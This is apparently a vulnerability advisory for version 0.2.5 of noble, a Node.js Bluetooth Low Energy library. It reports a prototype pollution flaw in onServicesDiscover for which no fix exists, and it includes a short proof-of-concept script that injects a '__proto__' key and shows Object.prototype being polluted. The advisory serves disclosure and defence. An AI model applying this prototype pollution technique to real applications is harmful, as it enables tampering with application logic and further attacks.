noble@0.2.5 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the noble package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Prototype Pollution

noble is an A Node.js BLE (Bluetooth Low Energy) central library.

Affected versions of this package are vulnerable to Prototype Pollution via onServicesDiscover. NOTE: This is proven to work using a local payload, however it is likely to also allow exploits through Bluetooth.

###PoC:

var noble = require('noble');
//noble.emit("servicesDiscover");
console.log({}.x);
try {
    noble.onServicesDiscover("__proto__", "x");
} catch(e) {}
console.log({}.x);

How to fix Prototype Pollution?

There is no fixed version for noble.

*